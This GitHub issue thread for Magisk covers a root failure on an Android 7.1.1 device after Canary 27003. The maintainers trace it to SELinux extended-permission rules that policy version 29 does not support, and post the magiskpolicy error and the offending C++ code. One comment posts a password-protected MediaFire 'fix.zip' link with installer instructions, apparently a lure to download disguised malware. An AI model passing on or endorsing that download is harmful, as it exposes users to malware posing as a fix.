### ISSUE TITLE
libsepol.avtab_write_item: policy version 29 does not support ioctl extendedpermissions rules and one was specified

### ISSUE THREAD

**Issue by KaMyKaSii** [topjohnwu/Magisk#8344]
Device: Quantum Go Q2
Android version: 7.1.1
Magisk version name: 8e82113b
Magisk version code: 27007

Following the [last issue](https://github.com/topjohnwu/Magisk/issues/8343), I decided to update Magisk through recovery, but after that the root was lost. The hidden app says that the root connection was lost and when restoring the default app it says that root is not available. To record the bootlog I decided to do a clean reinstall. For some reason the logcat disconnects during boot so I recorded a second one as soon as possible. When returning to TWRP, I noticed that the /cache/magisk.log file is not created so I imagine that Magisk is failing at a very early stage.
[bootlog-magisk27007-clean-install.zip](https://github.com/user-attachments/files/16776613/bootlog-magisk27007-clean-install.zip)
[magisk27007-patched-boot.zip](https://github.com/user-attachments/files/16776615/magisk27007-patched-boot.zip)
[stockboot.zip](https://github.com/user-attachments/files/16776616/stockboot.zip)

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yujincheng08** [comment]
Try patch boot instead. TWRP installation is not promised to always work. If it does not work, you use patch boot instead.

**Comment by yujincheng08** [comment]
Follow this to grab a bugreport: https://developer.android.com/studio/debug/bug-report

**Comment by KaMyKaSii** [comment]
> Follow this to grab a bugreport: https://developer.android.com/studio/debug/bug-report
[bugreport-NMF26X-2024-08-29-18-06-55.zip](https://github.com/user-attachments/files/16808168/bugreport-NMF26X-2024-08-29-18-06-55.zip)

**Comment by yujincheng08** [comment]
too late. reboot your device and grab bugreport as soon as it boots

**Comment by KaMyKaSii** [comment]
> too late. reboot your device and grab bugreport as soon as it boots

[bugreport-NMF26X-2024-08-30-00-08-59.zip](https://github.com/user-attachments/files/16811110/bugreport-NMF26X-2024-08-30-00-08-59.zip)

**Comment by yujincheng08** [comment]
> <11>[  113.884845]  (1)[1283:init]init: cannot setexeccon('u:r:magisk:s0'): Invalid argument

**Comment by canyie** [comment]
Root was working on 27002, right? Can you narrow down which Canary build the regression starts occurring? And is your device 32-bit?

**Comment by KaMyKaSii** [comment]
> Root was working on 27002, right? Can you narrow down which Canary build the regression starts occurring? And is your device 32-bit?

Yes, root works on 27002. I tested 27003 and root no longer works. The device is 64-bit

**Comment by canyie** [comment]
Both canary and debug builds don't work right? There are many new sepolicy-related commits in 27003 and these three submissions seems suspicious: d20b30c7710584bb15bbf02accd991c8d8627663 d654b9cb97dbf8fd532434e0f745e4835c72dafa and 865fca71a5954b3fc80f5f261fab889a99859dc2.
I'll take time to investigate this issue when I'm free.

**Comment by canyie** [comment]
```
magiskpolicy --load /data/local/tmp/sepolicy --magisk --save /data/local/tmp/newsepolicy
Load policy from: /data/local/tmp/sepolicy
libsepol.avtab_write_item: policy version 29 does not support ioctl extendedpermissions rules and one was specified
Fail to create policy image
```

**Comment by canyie** [comment]
```cpp
    if (impl->db->policyvers >= POLICYDB_VERSION_XPERMS_IOCTL) {
        argument all;
        all.first.push_back(nullptr);
        allowxperm(SEPOL_PROC_DOMAIN, ALL, "blk_file", all);
        allowxperm(SEPOL_PROC_DOMAIN, ALL, "fifo_file", all);
        allowxperm(SEPOL_PROC_DOMAIN, ALL, "chr_file", all);
    }
```
Regression 4d2921e742b34c848343a8372f51295ff74a182f
